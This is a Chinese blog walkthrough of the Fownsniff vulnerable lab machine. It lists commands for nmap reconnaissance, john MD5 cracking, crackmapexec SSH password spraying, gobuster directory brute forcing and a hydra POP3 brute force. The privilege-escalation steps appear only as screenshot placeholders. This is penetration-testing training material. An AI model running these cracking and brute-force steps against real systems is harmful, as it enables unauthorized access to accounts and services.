Fownsniff

本文详细介绍了使用Fownsniff进行网络扫描,包括C段扫描、端口扫描、详细信息扫描以及利用John进行MD5哈希破解的过程。此外,还涉及了目录爆破、Hydra工具对POP3服务的验证以及如何与POP3服务器交互进行登录爆破。
摘要由CSDN通过智能技术生成

靶机精讲 之 Fownsniff

[22,80,110,140]
# C段
sudo nmap -sn 192.168.95.0/24

# 端口扫描
sudo nmap -min-rate 10000 -p- 192.168.95.135

# 详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.95.135

# 保存信息收集的内容
sudo vom leaked_data
cat leaked_data
# 哈希破解
hash-identifier xxxxxxxxxx
# john破解[MD5]
sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt leaked_data

# 破解
crackmapexec ssh 192.168.95.135 -u users -p passwords --continue-on-success

# 目录爆破
sudo gobuster dir -u http://192.168.95.135 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

# hydra查看pop3服务
hydra -L users -P passwords -f 192.168.95.135 pop3
# 与pop3交互
sudo nc 192.168.95.135 110

端口扫描

image-20230507150149325

详细信息扫描

image-20230507151011966

查看80端口的界面

image-20230507150344202

信息收集

image-20230507150535899

john破解[MD5]

image-20230507150923725

处理操作

image-20230507151300266

image-20230507151347834

  • 碰撞破解

    image-20230507151429618

目录爆破

image-20230507151926342

hydra 破解[查看pop3信息]

image-20230507152100947

image-20230507152228037

  • 熟悉pop3服务器的语法【与pop3交互】

    pop3 服务器是邮件存储的地方

    image-20230507152431132

爆破登录

image-20230507152941696

提权操作

image-20230507153151552

image-20230507153302797

image-20230507153446143

image-20230507153502167

image-20230507153534861

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值